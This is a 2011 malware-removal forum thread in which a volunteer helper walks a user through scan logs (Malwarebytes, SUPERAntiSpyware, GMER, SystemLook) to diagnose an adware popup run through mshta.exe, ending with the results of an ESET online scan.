Windows Driver Package - Broadcom Bluetooth  (07/17/2009 6.2.0.9403) (Version: 07/17/2009 6.2.0.9403)
Windows Driver Package - Broadcom Bluetooth  (07/29/2009 6.1.7100.0) (Version: 07/29/2009 6.1.7100.0)
Windows Driver Package - Broadcom HIDClass  (06/11/2009 6.2.0.9500) (Version: 06/11/2009 6.2.0.9500)
Windows Live -perheturva (Version: 14.0.8118.427)
Windows Live Call (Version: 14.0.8117.0416)
Windows Live Communications Platform (Version: 14.0.8117.416)
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0)
Windows Live Messenger (Version: 14.0.8117.0416)
Windows Live Sync (Version: 14.0.8117.416)
Windows Live Writer (Version: 14.0.8117.0416)
Windows Liven asennustyokalu (Version: 14.0.8117.0416)
Windows Liven asennustyokalu (Version: 14.0.8117.416)
Windows Liven sahkoposti (Version: 14.0.8117.0416)
Windows Liven valokuvavalikoima (Version: 14.0.8117.416)
WinFlash (Version: 2.29.0)
WinRAR 4.00 beta 4 (32-bit) (Version: 4.00.4)
Wireless Console 3 (Version: 3.0.15)
YUME MIRU KUSURI (Version: 1.00.0000)
μTorrent (Version: 2.2.0)
沙耶の唄
車輪の国、向日葵の少女 1.0 (Version: 1.0)

========================= Memory info: ===================================

Percentage of memory in use: 73%
Total physical RAM: 4061.02 MB
Available physical RAM: 1058.13 MB
Total Pagefile: 8120.2 MB
Available Pagefile: 3507.03 MB
Total Virtual: 4095.88 MB
Available Virtual: 3997.8 MB

========================= Partitions: =====================================

1 Drive c: (OS) (Fixed) (Total:116.44 GB) (Free:62.76 GB) NTFS
2 Drive d: (DATA) (Fixed) (Total:334.67 GB) (Free:98.49 GB) NTFS
3 Drive f: (C2_DVD) (CDROM) (Total:2.15 GB) (Free:0 GB) UDF
4 Drive g: (ALC2010) (CDROM) (Total:3.65 GB) (Free:0 GB) CDFS

========================= Users: ========================================

Kayttajatilit \\ONOFF-PC

Jarjestelmanvalvoja      onoff                    Vieras                   
Komento on suoritettu.


== End of log == 

MBMA log:
Malwarebytes' Anti-Malware 1.51.1.1800
www.malwarebytes.org

Database version: 7384

Windows 6.1.7600
Internet Explorer 9.0.8112.16421

5.8.2011 16:56:53
mbam-log-2011-08-05 (16-56-53).txt

Scan type: Quick scan
Objects scanned: 176933
Time elapsed: 8 minute(s), 10 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system_boot_b7pH0qhs3YAmzvwoeQt8YqkFbMbt4tvk (Trojan.PMovie) -> Value: system_boot_b7pH0qhs3YAmzvwoeQt8YqkFbMbt4tvk -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

SUPERAntiSpyware log:
SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 08/05/2011 at 06:41 PM

Application Version : 5.0.1108

Core Rules Database Version : 7515
Trace Rules Database Version: 5327

Scan type : Complete Scan
Total Scan Time : 00:59:26

Operating System Information
Windows 7 Home Premium 64-bit (Build 6.01.7600)
UAC On - Limited User

Memory items scanned : 711
Memory threats detected : 0
Registry items scanned : 72405
Registry threats detected : 0
File items scanned : 65984
File threats detected : 25

Adware.Tracking Cookie
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@adform[2].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@apmebf[2].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@atdmt.combing[1].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@bs.serving-sys[2].txt
C:\Users\onoff\AppData\Roaming\Microsoft\Windows\Cookies\onoff@serving-sys[2].txt
alotporn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn.xxxkinky.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn1.image.freeporn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn1.pics.mofosex.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
cdn1.static1.pornrabbit.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
h2porn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media.mtvnservices.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media.scanscout.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media.theonion.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
media1.shufuni.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
msnbcmedia.msn.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
secure-us.imrworldwide.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
static.sunporno.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
vidii.hardsextube.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.alphaporno.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.naiadsystems.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.pornerbros.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.pornhub.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.porntube.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
www.sunporno.com [ C:\USERS\ONOFF\APPDATA\ROAMING\MACROMEDIA\FLASH PLAYER\#SHAREDOBJECTS\3D4PGK3L ]
GMER log:
GMER 1.0.15.15641 - http://www.gmer.net
Rootkit scan 2011-08-05 19:30:10
Windows 6.1.7600
Running: putd7b40.exe


---- Registry - GMER 1.0.15 ----

Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\0025d3afa434
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\0025d3afa434@00226564df7f 0x4E 0xC2 0xB8 0x50 ...
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\0025d3afa434 (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\0025d3afa434@00226564df7f 0x4E 0xC2 0xB8 0x50 ...

---- EOF - GMER 1.0.15 ----

SystemLook log:
SystemLook 30.07.11 by jpshortstuff
Log created at 19:44 on 05/08/2011 by onoff
Administrator - Elevation successful

========== filefind ==========

Searching for "mshta.exe /md5"
No files found.

========== dir ==========

C:\Windows\system32 - Parameters: "/t5"

---Files---
7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 --ah--- 10240 bytes [04:45 14/07/2009] [21:08 04/08/2011]
7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 --ah--- 10240 bytes [04:45 14/07/2009] [21:08 04/08/2011]

---Folders---
0409 d------ [05:37 14/07/2009]
AdvancedInstallers d------ [03:20 14/07/2009]
ar-SA d------ [03:20 14/07/2009]
bg-BG d------ [03:20 14/07/2009]
Boot d------ [03:20 14/07/2009]
catroot d------ [03:20 14/07/2009]
catroot2 d------ [03:20 14/07/2009]
CodeIntegrity d------ [03:20 14/07/2009]
com d------ [03:20 14/07/2009]
config d------ [03:20 14/07/2009]
cs-CZ d------ [03:20 14/07/2009]
da-DK d------ [03:20 14/07/2009]
de-DE d------ [03:20 14/07/2009]
Dism d------ [03:20 14/07/2009]
drivers d------ [03:20 14/07/2009]
DriverStore d------ [03:20 14/07/2009]
DRVSTORE d----c- [10:26 15/11/2010]
el-GR d------ [03:20 14/07/2009]
en d------ [05:37 14/07/2009]
en-US d------ [03:20 14/07/2009]
es-ES d------ [03:20 14/07/2009]
et-EE d------ [03:20 14/07/2009]
fi d------ [11:03 04/08/2009]
fi-FI d------ [03:20 14/07/2009]
fr-FR d------ [03:20 14/07/2009]
FxsTmp d------ [05:32 14/07/2009]
GroupPolicy d------ [03:20 14/07/2009]
GroupPolicyUsers d------ [03:20 14/07/2009]
he-IL d------ [03:20 14/07/2009]
hr-HR d------ [03:20 14/07/2009]
hu-HU d------ [03:20 14/07/2009]
ias d------ [03:20 14/07/2009]
icsxml d------ [03:20 14/07/2009]
IME d------ [03:20 14/07/2009]
inetsrv d------ [03:20 14/07/2009]
it-IT d------ [03:20 14/07/2009]
ja-JP d------ [03:20 14/07/2009]
ko-KR d------ [03:20 14/07/2009]
log d------ [10:18 15/11/2010]
LogFiles d------ [03:20 14/07/2009]
lt-LT d------ [03:20 14/07/2009]
lv-LV d------ [03:20 14/07/2009]
manifeststore d------ [03:20 14/07/2009]
Microsoft d---s-- [04:45 14/07/2009]
migration d------ [03:20 14/07/2009]
migwiz d------ [03:20 14/07/2009]
Msdtc d------ [03:20 14/07/2009]
MUI d------ [03:20 14/07/2009]
nb-NO d------ [03:20 14/07/2009]
NDF d------ [03:20 14/07/2009]
NetworkList d------ [03:20 14/07/2009]
nl-NL d------ [03:20 14/07/2009]
OEM d------ [05:20 29/07/2009]
oobe d------ [03:20 14/07/2009]
pl-PL d------ [03:20 14/07/2009]
Printing_Admin_Scripts d------ [05:37 14/07/2009]
pt-BR d------ [03:20 14/07/2009]
pt-PT d------ [03:20 14/07/2009]
ras d------ [03:20 14/07/2009]
Recovery d------ [03:20 14/07/2009]
restore d------ [05:32 14/07/2009]
ro-RO d------ [03:20 14/07/2009]
ru-RU d------ [03:20 14/07/2009]
Setup d------ [03:20 14/07/2009]
sk-SK d------ [03:20 14/07/2009]
sl-SI d------ [03:20 14/07/2009]
slmgr d------ [05:37 14/07/2009]
SMI d------ [03:20 14/07/2009]
Speech d------ [03:20 14/07/2009]
spool d------ [03:20 14/07/2009]
spp d------ [03:20 14/07/2009]
sppui d------ [03:20 14/07/2009]
sr-Latn-CS d------ [03:20 14/07/2009]
SRSLabs d------ [11:35 28/03/2010]
sv-SE d------ [03:20 14/07/2009]
sysprep d------ [03:20 14/07/2009]
Tasks d------ [03:20 14/07/2009]
th-TH d------ [03:20 14/07/2009]
tr-TR d------ [03:20 14/07/2009]
uk-UA d------ [03:20 14/07/2009]
Wat d------ [07:41 17/11/2010]
wbem d------ [03:20 14/07/2009]
WCN d------ [05:37 14/07/2009]
wdi d------ [03:20 14/07/2009]
wfp d------ [03:20 14/07/2009]
WinBioDatabase d------ [05:32 14/07/2009]
WinBioPlugIns d------ [05:32 14/07/2009]
WindowsPowerShell d------ [05:32 14/07/2009]
winevt d------ [03:20 14/07/2009]
winrm d------ [05:37 14/07/2009]
zh-CN d------ [03:20 14/07/2009]
zh-HK d------ [03:20 14/07/2009]
zh-TW d------ [03:20 14/07/2009]

C:\Windows\syswow64 - Parameters: "/t5"

---Files---
None found.

---Folders---
0409 d------ [05:37 14/07/2009]
AdvancedInstallers d------ [03:20 14/07/2009]
ar-SA d------ [03:20 14/07/2009]
ASUS_UL_Series_Screensaver dir d------ [11:41 28/03/2010]
bg-BG d------ [03:20 14/07/2009]
catroot d------ [03:20 14/07/2009]
catroot2 d------ [03:20 14/07/2009]
com d------ [03:20 14/07/2009]
config d------ [03:20 14/07/2009]
cs-CZ d------ [03:20 14/07/2009]
da-DK d------ [03:20 14/07/2009]
de-DE d------ [03:20 14/07/2009]
directx d------ [14:57 21/01/2011]
Dism d------ [03:20 14/07/2009]
drivers d------ [03:20 14/07/2009]
DriverStore d------ [03:20 14/07/2009]
el-GR d------ [03:20 14/07/2009]
en d------ [05:37 14/07/2009]
en-US d------ [03:20 14/07/2009]
es-ES d------ [03:20 14/07/2009]
et-EE d------ [03:20 14/07/2009]
fi d------ [11:03 04/08/2009]
fi-FI d------ [03:20 14/07/2009]
fr-FR d------ [03:20 14/07/2009]
FxsTmp d------ [05:32 14/07/2009]
GroupPolicy d------ [03:20 14/07/2009]
GroupPolicyUsers d------ [03:20 14/07/2009]
he-IL d------ [03:20 14/07/2009]
hr-HR d------ [03:20 14/07/2009]
hu-HU d------ [03:20 14/07/2009]
icsxml d------ [03:20 14/07/2009]
IME d------ [03:20 14/07/2009]
inetsrv d------ [03:20 14/07/2009]
InstallShield d------ [03:20 14/07/2009]
it-IT d------ [03:20 14/07/2009]
ja-JP d------ [03:20 14/07/2009]
ko-KR d------ [03:20 14/07/2009]
LogFiles d------ [05:32 14/07/2009]
lt-LT d------ [03:20 14/07/2009]
lv-LV d------ [03:20 14/07/2009]
Macromed d------ [11:31 28/03/2010]
manifeststore d------ [03:20 14/07/2009]
migration d------ [03:20 14/07/2009]
migwiz d------ [03:20 14/07/2009]
Msdtc d------ [03:20 14/07/2009]
MUI d------ [03:20 14/07/2009]
nb-NO d------ [03:20 14/07/2009]
NDF d------ [03:20 14/07/2009]
NetworkList d------ [03:20 14/07/2009]
nl-NL d------ [03:20 14/07/2009]
oobe d------ [03:20 14/07/2009]
pl-PL d------ [03:20 14/07/2009]
Printing_Admin_Scripts d------ [05:37 14/07/2009]
pt-BR d------ [03:20 14/07/2009]
pt-PT d------ [03:20 14/07/2009]
ras d------ [03:20 14/07/2009]
Recovery d------ [03:20 14/07/2009]
restore d------ [05:32 14/07/2009]
ro-RO d------ [03:20 14/07/2009]
RTCOM d------ [11:35 28/03/2010]
ru-RU d------ [03:20 14/07/2009]
Setup d------ [03:20 14/07/2009]
sk-SK d------ [03:20 14/07/2009]
sl-SI d------ [03:20 14/07/2009]
slmgr d------ [05:37 14/07/2009]
Speech d------ [03:20 14/07/2009]
spp d------ [03:20 14/07/2009]
sppui d------ [03:20 14/07/2009]
sr-Latn-CS d------ [03:20 14/07/2009]
sv-SE d------ [03:20 14/07/2009]
sysprep d------ [05:37 14/07/2009]
Tasks d------ [03:20 14/07/2009]
th-TH d------ [03:20 14/07/2009]
tr-TR d------ [03:20 14/07/2009]
uk-UA d------ [03:20 14/07/2009]
Wat d------ [07:41 17/11/2010]
wbem d------ [03:20 14/07/2009]
WCN d------ [05:37 14/07/2009]
wdi d------ [03:20 14/07/2009]
WindowsPowerShell d------ [05:32 14/07/2009]
winrm d------ [05:37 14/07/2009]
XPSViewer d------ [10:52 04/08/2009]
zh-CN d------ [03:20 14/07/2009]
zh-HK d------ [03:20 14/07/2009]
zh-TW d------ [03:20 14/07/2009]

-= EOF =-

SuperAntiSpyware didn't close my firefox while running its scan, and by default GMER had only C:\ checked for scanned files - is either of these a problem?

My computer is running fine. The VISUAL popup went away when I closed the window while not connected to the internet, but it (white box, same name) still shows up when I alt tab and in my task manager, so can't say the problem really went anywhere yet.

Should I try terminating the popup from task manager or restarting?

#4 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 05 August 2011 - 12:17 PM

SuperAntiSpyware didn't close my firefox while running its scan, and by default GMER had only C:\ checked for scanned files - is either of these a problem?

My computer is running fine. The VISUAL popup went away when I closed the window while not connected to the internet, but it (white box, same name) still shows up when I alt tab and in my task manager, so can't say the problem really went anywhere yet.

Should I try terminating the popup from task manager or restarting?


:step1: I don't think either SuperAntiSpyware not closing Firefox or GMER only checking C:\ are a problem.

:step2: If you open the Task Manager, what is listed under the Applications tab?

:step3: Rerun SystemLook
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :filefind
    mshta.exe
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#5 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 05 August 2011 - 12:43 PM

Under applications tab (that's the first tab, I presume? Running windows in my language, so doublechecking to make sure):
Firefox 3x - 2 windows + downloads window
the popup named as: http://pekci39u.com/reg2.php?cccid=b7pH0qhs3YAmzvwoeQt8YqkFbMbt4vk

Below the new log you asked:
SystemLook 30.07.11 by jpshortstuff
Log created at 20:42 on 05/08/2011 by onoff
Administrator - Elevation successful

========== filefind ==========

Searching for "mshta.exe"
C:\Windows\System32\mshta.exe --a---- 12288 bytes [11:22 01/05/2011] [11:22 01/05/2011] E49EC15EFFC9F01298093DBD7E0A31AF
C:\Windows\SysWOW64\mshta.exe --a---- 11776 bytes [11:22 01/05/2011] [11:22 01/05/2011] 061CBB1058A10C0875D18CAFF835AE97
C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_d009281f9a108e04\mshta.exe --a---- 43520 bytes [23:58 13/07/2009] [01:39 14/07/2009] 45B5032CD23466294C0A381BFC6E8C65
C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_cdf82d82dc01518b\mshta.exe --a---- 12288 bytes [11:22 01/05/2011] [11:22 01/05/2011] E49EC15EFFC9F01298093DBD7E0A31AF
C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_da5dd271ce714fff\mshta.exe --a---- 47104 bytes [23:42 13/07/2009] [01:14 14/07/2009] E2FE656A79D8F4C4FD70201E7423BDA0
C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_d84cd7d510621386\mshta.exe --a---- 11776 bytes [11:22 01/05/2011] [11:22 01/05/2011] 061CBB1058A10C0875D18CAFF835AE97

-= EOF =-

Edited by DaFe, 05 August 2011 - 12:44 PM.


#6 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 05 August 2011 - 12:48 PM

Under applications tab (that's the first tab, I presume? Running windows in my language, so doublechecking to make sure):
Firefox 3x - 2 windows + downloads window
the popup named as: http://pekci39u.com/reg2.php?cccid=b7pH0qhs3YAmzvwoeQt8YqkFbMbt4vk


Yes, the Applications tab is the first tab.

If you right click the pop-up name, and select Go To Process (the last item listed in the dropdown menu), it will switch to the Processes tab (the second tab). Please tell me the name of the highlighted file (this is the process associated with the pop-up).
Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#7 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 05 August 2011 - 01:14 PM

that would be the mshta.exe *32.

#8 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 05 August 2011 - 01:40 PM

That's odd. The actual mshta.exe file appears to be the correct file.

Rerun SystemLook
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :process
    mshta.exe
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#9 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 05 August 2011 - 02:11 PM

Okay, reran it. Log:
SystemLook 30.07.11 by jpshortstuff
Log created at 21:47 on 05/08/2011 by onoff
Administrator - Elevation successful

========== process ==========

mshta.exe - 1 handle(s) returned.
File path: C:\Windows\SysWOW64\mshta.exe
MD5: 061CBB1058A10C0875D18CAFF835AE97
Modules:
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SYSTEM32\wow64.dll
C:\Windows\SYSTEM32\wow64win.dll
C:\Windows\SYSTEM32\wow64cpu.dll

-= EOF =-

Could a restart or ending the task via task manager help now? Earlier it used to come back whenever closed, but now I cannot close the actual "window" anymore as it's only visible in task manager and alt tab menu, screenshots here: http://imageshack.us/g/231/popups.png/
What I'm getting at is - one of the earlier checks did find and quarantine a single troijan (+bunch of tracking cookies) - could it be that if that was the source and it was deleted while the popup was still open, it caused the ad to freeze when I closed it for the GREM scan.

#10 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 05 August 2011 - 02:18 PM

Hi DaFe,

You can try restarting. But first,

Rerun SystemLook
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :file
    C:\Windows\SYSTEM32\ntdll.dll
    C:\Windows\SYSTEM32\wow64.dll
    C:\Windows\SYSTEM32\wow64win.dll
    C:\Windows\SYSTEM32\wow64cpu.dll
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#11 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 05 August 2011 - 02:22 PM

Here you go:

SystemLook 30.07.11 by jpshortstuff
Log created at 22:21 on 05/08/2011 by onoff
Administrator - Elevation successful

========== file ==========

C:\Windows\SYSTEM32\ntdll.dll - File found and opened.
MD5: 678084C231715CB38A23D7326D6839BA
Created at 15:17 on 09/02/2011
Modified at 05:16 on 27/10/2010
Size: 1739176 bytes
Attributes: --a----
FileDescription: NT Layer -kirjasto (DLL)
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
ProductVersion: 6.1.7600.16385
OriginalFilename: ntdll.dll.mui
InternalName: ntdll.dll
ProductName: Microsoft® Windows® -käyttöjärjestelmä
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. Kaikki oikeudet pidätetään.

C:\Windows\SYSTEM32\wow64.dll - File found and opened.
MD5: E083B12FDC1D00E57E70C397ADFB3F0C
Created at 15:54 on 16/11/2010
Modified at 08:36 on 22/12/2009
Size: 243200 bytes
Attributes: --a----
FileDescription: Win32 Emulation on NT64
FileVersion: 6.1.7600.16491 (win7_gdr.091221-1602)
ProductVersion: 6.1.7600.16491
OriginalFilename: wow64.dll
InternalName: wow64
ProductName: Microsoft® Windows® Operating System
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. All rights reserved.

C:\Windows\SYSTEM32\wow64win.dll - File found and opened.
MD5: 982A28EE7BADBF30B6BC774035DD318F
Created at 23:38 on 13/07/2009
Modified at 01:41 on 14/07/2009
Size: 361984 bytes
Attributes: --a----
FileDescription: Wow64 Console and Win32 API Logging
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
ProductVersion: 6.1.7600.16385
OriginalFilename: wow64lg2.dll
InternalName: wow64lg2
ProductName: Microsoft® Windows® Operating System
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. All rights reserved.

C:\Windows\SYSTEM32\wow64cpu.dll - File found and opened.
MD5: 5E39878945C109AC68AC81A96DF4EC77
Created at 23:26 on 13/07/2009
Modified at 01:41 on 14/07/2009
Size: 13312 bytes
Attributes: --a----
FileDescription: AMD64 Wow64 CPU
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
ProductVersion: 6.1.7600.16385
OriginalFilename: wow64cpu.dll
InternalName: wow64cpu
ProductName: Microsoft® Windows® Operating System
CompanyName: Microsoft Corporation
LegalCopyright: © Microsoft Corporation. All rights reserved.

-= EOF =-

#12 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 05 August 2011 - 02:29 PM

I don't think those files have been modified (which is what I suspected), so go ahead and restart.
Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#13 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 05 August 2011 - 02:50 PM

After restart, the popup didn't return nor does mshta.exe show up in my processes list. Should I assume my system is clean now? I'm still slightly scared that it'll return when some of scheduled tasks come up and run.

#14 jntkwx

jntkwx

  • Malware Response Team
  • 4,339 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:New England, U.S.A.
  • Local time:11:38 PM

Posted 05 August 2011 - 02:52 PM

:step1: I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the Posted Image button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the Posted Image
      icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

Regards,
Jason

 

Simple and easy ways to keep your computer safe and secure on the Internet

If I am helping you and have not returned in 48 hours, please feel free to send me a PM with a link to the topic.
My help is free... however, if you wish to show appreciation and support me personally fighting against malware, please consider a donation: btn_donate_SM.gif


#15 DaFe

DaFe
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:38 AM

Posted 05 August 2011 - 05:30 PM

And here you go:

C:\Users\onoff\AppData\Local\Temp\mirc717.exe Win32/OpenCandy application deleted - quarantined
C:\Users\onoff\Downloads\mirc717.exe Win32/OpenCandy application deleted - quarantined

Those files should far predate the start of this problem.

Something odd did happen during the scan - my computer suddenly went to standby mode in middle of the scan. As this is a laptop hooked to an external screen and kb/mouse that I use with the lid closed, it's possible that the external power got cut for a splitsecond triggering the standby mode.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users